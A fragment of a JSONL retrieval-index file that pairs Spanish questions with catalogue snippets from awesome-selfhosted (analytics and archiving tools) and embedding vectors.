0.04046, 0.04624, 0.07643, -0.06769, -0.06011, -0.08065, 0.04179, -0.00972, -0.07917, -0.00798, -0.00084, -0.0289, -0.02238, 0.03155, -0.05261, 0.06419, 0.05061, 0.03917, 0.06977, -0.02728, 0.04942, -0.05442, 0.0218, 0.10409, -0.07754, 0.03, -0.0147, -0.04961, -0.08395, -0.003, 0.03827, 0.056, 0.01399, -0.07622, -0.00954, -0.06999, 0.02307, -0.01206, -0.04139, -0.03489, 0.05159, -0.05818, 0.02941, -0.01349, -0.07853, -0.00303, 0.04117, 0.06762, 0.01158, 0.01383, -0.08697, -0.0525, 0.06292, -0.02296, -0.1049, 0.0405, 0.00586, 0.03474, -0.03466, 0.05478, -0.00623, -0.04948, 0.02573, -0.00895, 0.05428, 0.01765, 0.04433, 0.10583, 0.10698, -0.14246, 0.09565, 0.03879, -0.08595, -0.03807, -0.00226, -0.02795, -0.02049, -0.05978, -0.01207, 0.00142, -0.02144, -0.01801, 0.05118, -0.04029, 0.00043, 0.00185, -0.00779, 0.10095, 0.03873, -0.04596, 0.08383, -0.05933, -0.05735, -0.00053, 0.06405, -0.04341, -0.05601, -0.00175, -0.03806, -0.02259, 0.01161, 0.01316, -0.03417, 0.03636, 0.058, -0.05226, -0.03425, -0.02541, 0.0217, -0.04584, -0.02201, -0.01452, 0.02177, -0.00734, 0.00234, -0.01941, -0.06435, 0.07538, 0.03818, -0.01556, -0.01717, 0.03413, 0.02372, -0.03028, 0.00513, 0.01043, 0.02303, -0.0101, 0.00573, 0.01066, 0.03762, -0.048, -0.00413, 0.00319, -0.03697, -0.01945, 0.01498, 0.05924, -0.02082, -0.00021, 0.00176, -0.01024, -0.06979, 0.05123, -0.02083, -0.0791, -0.04315, -0.02542, 0.01884, -0.03201, -0.05651, -0.01983]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Rybbit β€” Web and products analytics that is easy to setup and more intuitive (alternative to Google Analytics) [AGPL-3.0, Docker]. Shaper β€” Build Data Dashboards all in SQL. Powered by DuckDB [MPL-2.0, Docker/Nodejs/Python/Go]. Socioboard β€” Social media management, analytics, and reporting platform supporting nine social media networks out-of-the-box [⚠, GPL-3.0, Nodejs]. Statistics for Strava β€” Statistics dashboard generated from Strava data [⚠, AGPL-3.0, Docker]. Superset β€” Modern data exploration and visualization platform [Apache-2.0, Python]. Swetrix β€” Ultimate, open-source web analytics to satisfy all your needs [AGPL-3.0, Docker]. Umami β€” Simple, fast, privacy-focused alternative to Google Analytics [MIT, Nodejs/Docker]. Vince β€” Web analytics and dashboard (alternative to Google Analytics) [AGPL-3.0, Go/Docker/K8S/deb].", "indexar": "cual es una alternativa libre a Google Analytics para el anΓ‘lisis de productos?", "v": [-0.06301, 0.04335, 0.03767, -0.11374, -0.04861, -0.08284, 0.03061, -0.0489, -0.22786, 0.04103, -0.07164, -0.18865, -0.0991, 0.07801, 0.11571, -0.05375, 0.01828, -0.16328, 0.10743, 0.02837, -0.10299, -0.05774, -0.18982, -0.18639, -0.08476, -0.02841, -0.00791, 0.00753, -0.05883, 0.10814, -0.06877, -0.06947, -0.0989, -0.07865, -0.16386, 0.00999, 0.05468, 0.04922, 0.08368, -0.00395, -0.03649, -0.18323, -0.01517, 0.00386, -0.04515, -0.06072, -0.0187, 0.0769, -0.04409, 0.01441, -0.01262, 0.00111, -0.14889, 0.09801, 0.07705, 0.03963, 0.06367, -0.10968, 0.00202, -0.05006, -0.03403, 0.06146, 0.10554, 0.03316, 0.01907, 0.01979, -0.01816, 0.07951, -0.05015, 0.09666, 0.03546, 0.00826, -0.11017, -0.08097, 0.03987, 0.06781, 0.00821, 0.11004, -0.02546, 0.00154, 0.08954, -0.10636, -0.03883, 0.06572, 0.00859, -0.05926, 0.03874, -0.12538, 0.01501, -0.03522, -0.01018, 0.03221, -0.05377, 0.07049, -0.02494, 0.01239, 0.14437, -0.12004, 0.01005, 0.03928, 0.09607, 0.01679, -0.04343, 0.00103, 0.0591, -0.00465, -0.05357, 0.01868, -0.16494, 0.03019, -0.05524, -0.02284, -0.03206, -0.04382, 0.09474, 0.00752, -0.00916, 0.02413, -0.03757, 0.01191, 0.01509, 0.01291, -0.1542, -0.08039, -0.09627, 0.05464, 0.03316, 0.007, 0.04036, -0.02034, 0.08667, -0.01142, -0.04468, -0.03222, -0.04086, 0.04853, 0.08188, -0.03948, -0.02505, 0.00221, 0.01483, -0.01453, 0.0804, 0.02758, 0.08499, -0.05312, -0.0437, -0.01061, -0.07716, -0.01073, -0.06044, 0.01845, -0.05738, 0.07547, 0.01285, 0.02201, -0.13758, -0.05164, -0.02624, 0.02208, -0.03602, -0.0525, 0.05682, 0.03815, 0.05942, -0.01202, 0.05824, -0.05138, -0.04105, 0.02124, -0.02866, 0.04908, 0.03172, -0.07305, 0.05968, -0.01763, -0.0161, -0.07082, 0.07378, -0.07062, -0.02351, -0.01144, -0.01763, -0.00378, -0.01427, -0.08594, 0.01088, -0.06457, 0.07087, 0.07349, -0.05142, 0.02914, 0.00012, -0.04971, 0.07767, -0.02487, 0.00426, -0.10458, 0.01343, -0.01184, -0.06632, -0.00592, -0.00948, -0.02604, -0.05004, 0.02229, 0.01136, 0.03497, 0.01313, -0.01619, -0.01771, -0.04598, 0.03592, -0.02356, -0.03492, -0.01949, 0.01516, -0.00567, 0.00899, 0.01723, 0.00615, 0.01139, 0.01351, 0.00422, -0.05611, 0.03108, 0.01991, 0.00286, -0.04514, -0.02626, 0.00157, -0.02262, -0.03356, 0.02478, 0.01174, -0.02675, 0.00583, -0.00646, 0.04956, -0.00319, 0.07267, 0.05012, -0.04324, 0.0179, -0.02481, 0.03047, -0.04667, 0.00571, -0.04989, -0.06741, -0.05986, 0.02321, 0.03558, 0.00686, 0.05263, 0.00572]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): ArchiveBox β€” Create HTML & screenshot archives of sites from your bookmarks, browsing history, RSS feeds, or other sources (alternative to Wayback Machine) [MIT, Python/Docker]. ArchivesSpace β€” Archives information management application for managing and providing Web access to archives, manuscripts and digital objects [ECL-2.0, Ruby]. Bichon β€” Email archiving server that syncs from IMAP accounts, indexes emails for full-text search, and provides a REST API. No external database required, includes WebUI with multi-account support [AGPL-3.0, Rust/Docker]. bitmagnet β€” BitTorrent indexer, DHT crawler, content classifier and torrent search engine with web UI, GraphQL API and Servarr stack integration [MIT, Go/Docker]. CKAN β€” Make open data websites [AGPL-3.0, Python]. Collective Access - Providence β€” Highly configurable Web-based framework for management, description, and discovery of digital and physical collections supporting a variety of metadata standards, data types, and media formats [GPL-3.0, PHP].", "indexar": "quΓ© programa puedo usar para crear archivos HTML y capturas de pantalla de los sitios que guardo en mis bookmarks?", "v": [0.10772, 0.02298, -0.14406, -0.21044, -0.03492, -0.13552, -0.00017, -0.00967, 0.02914, -0.07299, -0.02347, -0.0685, -0.04189, 0.01838, 0.00011, 0.02167, 0.1471, -0.02994, 0.07329, -0.05747, -0.06323, 0.04547, -0.02886, -0.05134, -0.12306, -0.2031, 0.01745, 0.0527, -0.15908, 0.05121, -0.01028, 0.01969, 0.0123, 0.00074, -0.1122, -0.04022, 0.11534, 0.01419, -0.08108, 0.07658, 0.0135, 0.06923, -0.14372, 0.00374, -0.0611, -0.03909, 0.11621, -0.06253, -0.05637, -0.02241, -0.01163, 0.00676, -0.17481, -0.00966, -0.00353, -0.03118, 0.0831, -0.09309, -0.01426, 0.03303, -0.0677, 0.08528, 0.05083, -0.06104, -0.05306, -0.07314, 0.00839, 0.08976, -0.14259, 0.11047, 0.05087, 0.08286, 0.09315, 0.03871, 0.12062, 0.08834, -0.05819, -0.08656, 0.00457, -0.00438, -0.08956, -0.0949, -0.05788, -0.02161, -0.11638, 2e-05, -0.03112, -0.06518, -0.08954, -0.12125, 0.11957, 0.07412, -0.06151, 0.061, -0.01712, -0.13913, 0.08312, 0.04549, 0.07076, -0.01034, 0.00098, -0.08341, -0.05848, 0.15034, 0.03797, 0.07684, 0.01953, -0.022, 0.01925, 0.01539, 0.04652, 0.00501, -0.06056, 0.03815, -0.07878, 0.05187, 0.06527, -0.0952, 0.06572, -0.11587, -0.06115, -0.00691, -0.12878, -0.07485, 0.10068, 0.09037, 0.00918, 0.11028, -0.07227, 0.0213, -0.02332, -0.00282, -0.07714, -0.01017, -0.05563, 0.00257, 0.09464, 0.03735, -0.02068, -0.07734, 0.00396, -0.02675, -0.04375, 0.04748, 0.03287, 0.03585, 9e-05, -0.0014, -0.10015, 0.01173, -0.00121, -0.01262, -0.00697, -0.03987, -0.0521, 0.06454, 0.00428, -0.04844, -0.03907, 0.0253, -0.06263, -0.00076, -0.01391, 0.04623, -0.01402, -0.10243, -0.03501, 0.0631, 0.0765, 0.06381, -0.01538, 0.11283, -0.04295, -0.14512, 0.01992, -0.01464, -0.0345, 0.01101, 0.03695, -0.04633, -0.03797, 0.04278, 0.01953, 0.01658, 0.00778, -0.08268, 0.02395, 0.00118, -0.04207, 0.04401, -0.01658, 0.00123, 0.00222, 0.04392, 0.0101, -0.03273, 0.00616, 0.02961, 0.06638, -0.05009, 0.02158, -0.0738, -0.01257, 0.00039, 0.01919, 0.03497, -0.07604, 0.01577, 0.03786, 0.01811, 0.00642, -0.00337, 0.0248, -0.05206, -0.006, -0.03504, 0.04475, 0.01527, -0.01387, -0.01061, 0.0622, 0.01128, -0.01058, 0.05338, 0.03513, -0.025, 0.01626, 0.03442, 0.01539, -0.00298, -0.01122, -0.04192, -0.03389, -0.02174, 0.01702, 0.02924, -0.06034, -0.01667, -0.04464, -0.00761, -0.03992, 0.04728, -0.02789, -0.03122, -0.00045, -0.02002, -0.05486, 0.02604, 0.01658, -0.03694, -0.07486, 0.01442, 0.0636, -0.01046, 0.00095, 0.05623]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): ArchiveBox β€” Create HTML & screenshot archives of sites from your bookmarks, browsing history, RSS feeds, or other sources (alternative to Wayback Machine) [MIT, Python/Docker]. ArchivesSpace β€” Archives information management application for managing and providing Web access to archives, manuscripts and digital objects [ECL-2.0, Ruby]. Bichon β€” Email archiving server that syncs from IMAP accounts, indexes emails for full-text search, and provides a REST API. No external database required, includes WebUI with multi-account support [AGPL-3.0, Rust/Docker]. bitmagnet β€” BitTorrent indexer, DHT crawler, content classifier and torrent search engine with web UI, GraphQL API and Servarr stack integration [MIT, Go/Docker]. CKAN β€” Make open data websites [AGPL-3.0, Python]. Collective Access - Providence β€” Highly configurable Web-based framework for management, description, and discovery of digital and physical collections supporting a variety of metadata standards, data types, and media formats [GPL-3.0, PHP].", "indexar": "con quΓ© puedo montar un servidor de archivado de correos electrΓ³nicos con bΓΊsqueda de texto completo sin base de datos externa?", "v": [0.04203, 0.07703, -0.0989, -0.10316, -0.0506, -0.08268, 0.05967, -0.05443, -0.06247, -0.11876, -0.14263, -0.06561, 0.06212, -0.0603, 0.11386, -0.0216, 0.26231, -0.03106, 0.04672, -0.03989, 0.00851, -0.04799, -0.05798, -0.0533, -0.09209, 0.02016, -0.07795, 0.0238, -0.04839, 0.10168, 0.02728, 0.03261, 0.02501, 0.03429, 0.00694, 0.05286, 0.10394, 0.11604, -0.09747, -0.05322, 0.09184, 0.01013, -0.12956, 0.03334, -0.05739, -0.09985, 0.02182, -0.01754, 0.03326, -0.04508, -0.04145, -0.04926, -0.18835, -0.00922, -0.07878, -0.0533, 0.20439, -0.10238, 0.19539, -0.03267, -0.04959, 0.12774, 0.05558, 0.06076, -0.01122, 0.02595, 0.04925, -0.0329, -0.1665, 0.00917, 0.01359, 0.06153, -0.04999, -0.07733, 0.01049, 0.02827, -0.00125, 0.01579, -0.01304, 0.14797, 0.00479, -0.0468, -0.02847, 0.07081, -0.0667, -0.09595, 0.00737, -0.02804, 0.00745, -0.05869, 0.11617, 0.05658, -0.10806, 0.05042, 0.00316, -0.03014, -0.02955, -0.01871, -0.05789, 0.12206, 0.01812, 0.10858, -0.00114, 0.11182, 0.02203, 0.03892, 0.05101, -0.02683, 0.10646, -0.03281, -0.04097, -0.07454, -0.05362, 0.01364, -0.10037, -0.13362, -0.00277, -0.02582, 0.01986, 0.00744, -0.05983, 0.02265, 0.05828, 0.03134, 0.05612, -0.06544, 0.05316, 0.00443, 0.00958, 0.05435, -0.01619, -0.05403, -0.08002, -0.0549, 0.04111, 0.03511, -0.05557, -0.04031, -0.03981, -0.05821, 0.02479, 0.01656, -0.02996, -0.00855, 0.07649, 0.00899, 0.10947, -0.04188, -0.11252, -0.03577, -0.00631, 0.0143, -0.00119, 0.04358, -0.09204, 0.01723, 0.02473, -0.10096, -0.00623, 0.03572, 0.01741, 0.09403, -0.02762, 0.08142, 0.02523, -0.0586, -0.02859, 0.02558, 0.00389, 0.02281, -0.08385, 0.00222, -0.00701, -0.11714, 0.00044, 0.00628, -0.05614, 6e-05, -0.006, -0.00171, -0.04163, 0.04756, -0.021, 0.00036, -0.08891, -0.02047, 0.08201, -0.06561, 0.016, -0.02097, 0.02437, 0.02234, -0.03127, 0.07873, 0.03448, -0.07624, -0.07672, 0.0038, 0.00159, -0.07532, -0.05897, -0.02087, -0.02091, -0.00957, -0.03072, 0.00393, -0.06845, 0.02403, -0.03805, 0.03814, 0.01282, -0.03543, 0.06668, -0.04905, -0.05724, -0.00997, 0.05016, -0.03717, -0.0057, 0.05855, -0.00547, 0.03187, 0.05274, -0.00744, 0.00205, 0.04012, 0.0424, 0.02467, 0.02641, 0.01022, -0.03283, 0.0416, -0.04771, -0.01276, 0.05545, 0.00033, 0.01837, -0.05668, -0.07343, -0.0653, 0.02581, 0.05796, -0.08495, -0.03618, -0.00847, -0.04185, -0.09418, 0.04208, -0.04841, -0.03787, -0.03603, -0.04226, 0.01308, -0.05109, 0.02376, -0.03491]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): ArchiveBox β€” Create HTML & screenshot archives of sites from your bookmarks, browsing history, RSS feeds, or other sources (alternative to Wayback Machine) [MIT, Python/Docker]. ArchivesSpace β€” Archives information management application for managing and providing Web access to archives, manuscripts and digital objects [ECL-2.0, Ruby]. Bichon β€” Email archiving server that syncs from IMAP accounts, indexes emails for full-text search, and provides a REST API. No external database required, includes WebUI with multi-account support [AGPL-3.0, Rust/Docker]. bitmagnet β€” BitTorrent indexer, DHT crawler, content classifier and torrent search engine with web UI, GraphQL API and Servarr stack integration [MIT, Go/Docker]. CKAN β€” Make open data websites [AGPL-3.0, Python]. Collective Access - Providence β€” Highly configurable Web-based framework for management, description, and discovery of digital and physical collections supporting a variety of metadata standards, data types, and media formats [GPL-3.0, PHP].", "indexar": "cuΓ‘l es una alternativa libre a la Wayback Machine para archivar pΓ‘ginas web?", "v": [-0.0578, 0.09125, 0.03098, -0.09352, -0.14526, -0.10833, 4e-05, -0.04918, -0.08409, 0.00595, -0.05753, -0.22332, -0.01932, 0.0978, 0.13858, -0.00618, 0.05978, -0.07416, 0.1651, -0.02993, 0.00245, 0.06911, -0.12742, -0.04171, -0.03715, -0.08066, 0.0535, 0.01254, -0.17988, 0.05046, -0.04224, 0.09909, 0.07743, 0.00144, -0.07625, 0.0461, 0.19806, 0.11048, 0.00668, -0.04394, -0.05174, -0.1354, -0.08874, 0.13053, -0.02118, -0.05046, -0.02729, -0.02307, 0.00929, 0.04303, -0.02727, -0.09789, -0.05535, 0.14174, 0.0365, -0.06557, 0.1948, -0.06491, 0.02245, -0.0176, -0.09798, 0.12011, -0.0329, 0.04713, -0.00138, -0.03727, -0.12829, -0.01596, -0.03015, 0.08894, 0.02404, -0.01507, 0.14531, -0.05163, -0.03863, 0.00191, -0.0096, 0.05127, -0.01827, 0.078, 0.07934, -0.04936, -0.04431, 0.05973, -0.04614, -0.02586, -0.00394, -0.07166, 0.08237, -0.03253, 0.03654, 0.05242, -0.02754, 0.03851, -0.02045, -0.17948, -0.01426, 0.10921, 0.04871, -0.0435, 0.01084, 0.01934, -0.05145, -0.01218, 0.06387, 0.03818, -0.03315, 0.05038, -0.09382, 0.00318, 0.0118, 0.04537, 0.01792, -0.0115, -0.0945, 0.04643, 0.03915, 0.1233, 0.03429, -0.05457, -0.027, 0.02644, -0.11536, -0.0515, 0.00677, 0.07835, 0.0609, 0.03636, -0.06696, -0.05297, 0.01815, -0.03934, -0.08985, -0.01556, -0.02914, 0.01045, 0.02421, -0.04022, 0.00883, -0.02375, 0.08953, -0.01754, -0.08694, -0.01997, 0.05689, -0.11698, 0.00899, -0.03444, -0.11881, -0.11239, -0.07367, -0.03406, 0.00163, 0.05584, -0.02548, -0.01196, -0.02748, -0.0649, -0.06357, 0.05521, -0.01142, -0.00828, -0.01893, 0.02574, -0.02385, -0.02597, -0.07489, 0.01913, -0.01758, -0.0385, -0.00406, 0.07159, 0.06655, -0.13847, 0.0835, -0.01463, -0.00808, -0.03897, 0.10402, -0.01193, 0.02614, -0.02334, -0.01873, -0.01355, -0.05765, -0.04982, 0.05333, -0.02955, -0.00661, -0.01884, -0.02889, -0.01526, -0.10348, -0.03088, 0.02462, 0.03276, -0.06339, -0.00844, 0.02975, 0.00398, -0.12312, -0.06704, -0.01121, 0.01926, -0.00543, 0.01166, -0.04384, 0.00016, -0.02147, -0.01492, 0.03279, -0.05687, 0.04518, -0.02955, -0.08227, -0.02505, 0.01775, -0.03345, -0.02685, -0.02002, 0.08862, 0.00717, 0.01048, 0.0142, 0.05772, 0.02173, 0.05612, 0.03658, -0.01686, -0.03082, -0.00598, -0.01113, -0.01882, 0.03075, 0.0026, -0.00725, 0.02913, 0.04548, 0.00029, -0.02608, 0.02733, 0.02582, -0.03999, 0.04904, -0.01817, -0.04856, -0.0732, -0.02214, 0.01972, -0.02578, -0.03698, 0.00964, -0.00109, 0.03105, 0.01344, -0.01167]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Eonvelope β€” Email archiving software that allows you to preserve your emails for an indefinite long period of time [AGPL-3.0, K8S/Docker]. Ganymede β€” Twitch VOD and live stream archiving platform. Includes a rendered chat for each archive [⚠, GPL-3.0, Docker]. mail-archiver β€” Web application for archiving, searching, and exporting emails from multiple accounts (IMAP, M365 or Import). Featuring folder sync, attachment support, mailbox migration and a dashboard [GPL-3.0, Docker]. Omeka S β€” Next-generation web publishing platform for institutions interested in connecting digital cultural heritage collections with other resources online [GPL-3.0, Nodejs]. Open Archiver β€” Email archiving solution with full-text search and eDiscovery search features [AGPL-3.0, Docker]. Piler β€” Feature-rich email archiving solution [GPL-3.0, C/Docker/deb]. Wallabag β€” Wallabag, formerly Poche, is a web application allowing you to save articles to read them later with improved readability [MIT, PHP].", "indexar": "quΓ© herramienta me sirve para archivar mis correos electrΓ³nicos de forma permanente?", "v": [0.04942, 0.06061, -0.0552, -0.08917, 0.03374, -0.10169, 0.04752, -0.01974, -0.07734, -0.12249, -0.10904, -0.02393, 0.1003, -0.05491, 0.18652, -0.04649, 0.20947, -0.02972, 0.0209, -0.0055, 0.0013, 0.02297, -0.16, -0.03188, -0.11387, 0.00051, -0.05222, 0.07579, -0.11289, 0.15026, 0.04381, 0.07328, 0.02468, -0.03004, -0.02344, 0.0734, 0.09687, 0.10133, -0.11435, 0.02135, 0.08764, 0.01422, -0.09696, 0.03406, -0.05481, -0.09458, -0.02304, 0.05868, 0.03696, 0.09042, -0.05194, -0.08221, -0.1487, 0.07591, -0.02004, -0.09495, 0.16303, -0.13831, 0.14686, -0.10578, -0.0715, 0.05212, 0.02698, 0.05653, -0.00988, -0.01002, 0.02018, -0.1278, -0.22915, 0.02132, 0.02411, 0.04973, 0.03383, -0.03828, -0.03071, 0.02189, -0.01204, 0.01986, -0.05297, 0.07218, 0.08446, -0.09619, -0.00166, 0.02376, -0.0356, -0.09791, 0.02687, -0.01731, -0.06837, -0.15394, 0.0282, 0.0743, -0.0768, 0.04976, 0.02245, -0.00699, -0.06828, -0.00722, -0.03935, 0.09755, 0.07251, 0.04567, -0.0771, 0.08066, -0.08673, 0.02008, -0.04875, 0.01075, 0.09999, -0.00856, -0.03494, -0.02282, 0.04162, 0.01903, -0.0583, -0.0028, 0.02254, -0.08131, -0.00963, -0.0091, 0.04246, 0.0245, 0.00563, 0.00325, 0.04457, -0.03861, -0.045, 0.00835, -0.00861, 0.03885, -0.02747, -0.08768, -0.04449, 0.00457, 0.03369, -0.03327, -0.04404, -0.08425, -0.01928, -0.06456, 0.07973, 0.05128, -0.05662, -0.08653, 0.02419, 0.00342, 0.08094, -0.06056, -0.12685, -0.08168, -0.01207, -0.07105, -0.01841, 0.01046, -0.04128, 0.04802, 0.00294, -0.10884, -0.05429, 0.06275, -0.07371, 0.00546, 0.04413, 0.05788, -0.05799, -0.11542, 0.00969, 0.08048, 0.0018, 0.03248, 0.00857, -0.02909, 0.04604, -0.10457, -0.0238, -0.04723, -0.02721, 0.07407, 0.04694, -0.04753, -0.07159, 0.09923, 0.01037, 0.00921, -0.08619, -0.01477, 0.06668, -0.06753, 0.01885, 0.03743, -0.00806, -0.00328, -0.03353, 0.01219, -0.00969, 0.00025, -0.09083, -0.03444, -0.02297, -0.04472, -0.02879, -0.03197, -0.01901, 0.00373, 0.00624, 0.06054, -0.05959, -0.04015, -0.02887, 0.04863, 0.00032, -0.04783, 0.05022, -0.03322, -0.0302, -0.03771, 0.04671, -0.01047, -0.01786, 0.00373, 0.04378, -0.0177, 0.02973, -0.02176, 0.02702, 0.05806, 0.03301, 0.05482, 0.01189, -0.0188, 0.01167, 0.00985, -0.02959, -0.0076, 0.04454, -0.01721, 0.04892, -0.05769, -0.05839, -0.05377, 0.00419, 0.06154, -0.02503, 0.01634, -0.01097, -0.03261, -0.05627, 5e-05, -0.07548, -0.03553, -0.03306, 0.00247, 0.0318, -0.02273, 0.01288, 0.00505]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Eonvelope β€” Email archiving software that allows you to preserve your emails for an indefinite long period of time [AGPL-3.0, K8S/Docker]. Ganymede β€” Twitch VOD and live stream archiving platform. Includes a rendered chat for each archive [⚠, GPL-3.0, Docker]. mail-archiver β€” Web application for archiving, searching, and exporting emails from multiple accounts (IMAP, M365 or Import). Featuring folder sync, attachment support, mailbox migration and a dashboard [GPL-3.0, Docker]. Omeka S β€” Next-generation web publishing platform for institutions interested in connecting digital cultural heritage collections with other resources online [GPL-3.0, Nodejs]. Open Archiver β€” Email archiving solution with full-text search and eDiscovery search features [AGPL-3.0, Docker]. Piler β€” Feature-rich email archiving solution [GPL-3.0, C/Docker/deb]. Wallabag β€” Wallabag, formerly Poche, is a web application allowing you to save articles to read them later with improved readability [MIT, PHP].", "indexar": "con quΓ© puedo montar una plataforma para guardar y reproducir grabaciones de Twitch con chat?", "v": [-0.00305, 0.07677, -0.23416, -0.06031, -0.0244, 0.00871, -0.04168, 0.07308, 0.01617, -0.12514, 0.02588, -0.04639, 0.08039, 0.11344, 0.03948, 0.1276, 0.03314, -0.09676, 0.06835, 0.06177, 0.03453, 0.00217, -0.00287, -0.19097, -0.00116, -0.01893, 0.10391, -0.08105, -0.1351, 0.09408, -0.00151, 0.04706, 0.0113, 0.09009, -0.06211, -0.06367, 0.06114, -0.01356, -0.02911, -0.02653, -0.06089, -0.00741, -0.06963, 0.08171, 0.04446, -0.01214, 0.0488, -0.09461, 0.0626, 0.04205, -0.00317, -0.02285, -0.10244, 0.02738, -0.03168, -0.07151, 0.20632, -0.09406, 0.14704, -0.02337, -0.08713, 0.06329, 0.01183, 0.05016, 0.0124, 0.014, -0.1353, 0.06074, -0.13047, 0.13044, -0.07128, 0.0452, -0.0163, 0.04015, 0.01749, 0.09839, -0.09438, -0.08031, -0.0116, -0.01634, -0.06441, -0.06261, -0.01278, 0.11064, -0.00771, 0.0068, -0.02869, -0.06521, 0.05247, -0.02217, 0.01097, -0.0037, 0.00152, 0.06302, 0.09481, -0.18394, 0.09358, 0.06306, -0.08178, -0.0527, -0.058, 0.05499, -0.06168, 0.11579, -0.0927, 0.05177, 0.09022, -0.1165, 0.01447, 0.00653, 0.05039, 0.10506, -0.08972, 0.05231, -0.08869, -0.0485, -0.05528, 0.0101, 0.06523, 0.11577, 0.01696, 0.09876, 0.02967, -0.06609, 0.09526, -0.0025, 0.02992, 0.0515, -0.06682, 0.01667, -0.01995, -0.00469, -0.07141, -0.06142, 0.00592, 0.01001, 0.05953, 0.05914, 0.07749, -0.01352, 0.07352, 0.02333, -0.02246, -0.07252, 0.15641, -0.00542, 0.02624, -0.08269, -0.04835, 0.06508, 0.02745, 0.05646, 0.00973, -0.0176, -0.04956, 0.00032, 0.06018, -0.10467, -0.04116, 0.05053, -0.0128, 0.0289, -0.02341, -0.00808, 0.02034, 0.02522, -0.0553, 0.04436, -0.005, -0.05501, -0.01216, 0.01902, 0.11738, -0.15331, 0.0332, -0.0435, -0.07923, -0.02311, 0.03371, -0.09843, -0.04221, -0.03133, -0.00782, 0.01884, -0.00296, 0.03929, 0.01746, 0.01107, -0.02329, 0.08836, -0.00043, 0.04124, -0.02033, 0.00432, 0.04602, -0.03862, -0.04491, 0.03214, -0.01372, 0.01719, -0.01992, 0.00602, -0.01352, -0.03759, 0.04439, -0.06606, -0.1034, 0.02762, 0.03711, 0.00831, -0.00647, 0.00936, 0.056, -0.00699, -0.05261, 0.0156, 0.03872, -0.03016, -0.04008, -0.00019, -0.01214, 0.04215, 0.0499, 0.03925, -0.02166, -0.01486, 0.04955, 0.01785, 0.05955, 0.02707, -0.02236, 0.02507, -0.00021, -0.02206, -0.01611, -0.00803, 0.01361, 0.00703, -0.08137, -0.00802, -0.02526, 0.03399, -0.00962, 0.02084, 0.00444, -0.03861, -0.04444, 0.06298, -0.03003, -0.09499, 0.00471, 0.0306, 0.04018, -0.04608, -0.0539, -0.02157]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Eonvelope β€” Email archiving software that allows you to preserve your emails for an indefinite long period of time [AGPL-3.0, K8S/Docker]. Ganymede β€” Twitch VOD and live stream archiving platform. Includes a rendered chat for each archive [⚠, GPL-3.0, Docker]. mail-archiver β€” Web application for archiving, searching, and exporting emails from multiple accounts (IMAP, M365 or Import). Featuring folder sync, attachment support, mailbox migration and a dashboard [GPL-3.0, Docker]. Omeka S β€” Next-generation web publishing platform for institutions interested in connecting digital cultural heritage collections with other resources online [GPL-3.0, Nodejs]. Open Archiver β€” Email archiving solution with full-text search and eDiscovery search features [AGPL-3.0, Docker]. Piler β€” Feature-rich email archiving solution [GPL-3.0, C/Docker/deb]. Wallabag β€” Wallabag, formerly Poche, is a web application allowing you to save articles to read them later with improved readability [MIT, PHP].", "indexar": "cual es un programa web para leer artΓ­culos despuΓ©s que los he guardados en lugar de perderlos", "v": [-0.04802, 0.0533, 0.01172, 0.06608, -0.01483, -0.013, 0.0668, 0.00682, -0.06348, -0.08109, -0.06534, -0.04472, -0.08414, -0.03612, 0.062, 0.01131, 0.106, -0.04406, 0.09462, 0.05605, -0.05606, 0.1105, 0.0427, -0.06503, -0.09541, -0.06083, 0.05188, -0.06334, -0.11849, 0.07943, -0.11447, 0.06848, 0.01906, -0.08857, -0.03849, 0.03389, 0.11008, 0.06763, -0.07687, 0.10196, 0.01473, -0.00828, 0.00291, 0.00801, -0.0432, -0.15216, 0.05204, -0.01416, -0.01082, -0.05737, 0.01089, 0.07244, -0.0072, -0.07377, 0.04877, -0.09061, 0.09517, -0.03526, -0.00396, 0.01653, -0.11127, 0.10824, 0.05737, -0.00366, 0.01307, -0.04924, 0.02801, 0.11883, -0.10942, 0.0217, -0.08839, -0.01677, 0.02893, -0.00388, -0.04026, 0.0642, -0.0396, 0.04514, 0.07908, -0.04845, 0.00821, -0.01093, -0.01929, 0.10685, -0.08243, -0.04801, 0.02858, -0.03308, -0.02252, 0.00914, 0.03767, 0.08456, -0.11061, 0.0692, -0.09984, -0.10703, 